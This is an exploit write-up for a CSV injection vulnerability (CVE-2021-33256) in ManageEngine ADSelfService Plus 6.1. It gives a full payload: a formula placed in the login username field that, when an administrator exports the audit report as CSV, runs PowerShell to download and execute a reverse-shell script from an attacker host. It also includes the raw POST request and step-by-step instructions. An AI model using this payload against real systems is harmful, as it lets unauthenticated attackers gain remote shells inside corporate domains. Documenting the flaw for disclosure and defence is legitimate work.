ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)

Obtain reverse shell in the domain environment exploiting CSV injection vulnerability

# Description

There is a CSV injection vulnerability on the login panel of ManageEngine ADSelfService can be exploited by unauthenticated user. j_username parameter seems to vulnerable and reverse shell could be obtained if privileged user exports "User Attempts Audit Report" as CSV file.

=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0

# Proof Of Concept

1- Malicious user sends POST request to login page https://TARGET-IP/j_security_check and sets j_username parameter as like the above payload.

j_username parameter:
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'
POST Request:
POST /j_security_check HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Connection: close
Cookie: *
Upgrade-Insecure-Requests: 1


And the request attempt will be saved to"User Attempts Audit Report" table that is under the Reports > Audit Reports section. Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12

j_username parameter value is saved to "User Name" column which is start of line in the CSV file:

=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('')'

2- Powershell command that sends reverse shell to attacker machine is embeded to last line of theInvoke-PowershellTcp.ps1 file.

3- If admin user exports this table as CSV file and confirms the alert popup, reverse shell connection will be obtained by malicious user.

# Author: Metin Yunus Kandemir

# Reference

Last updated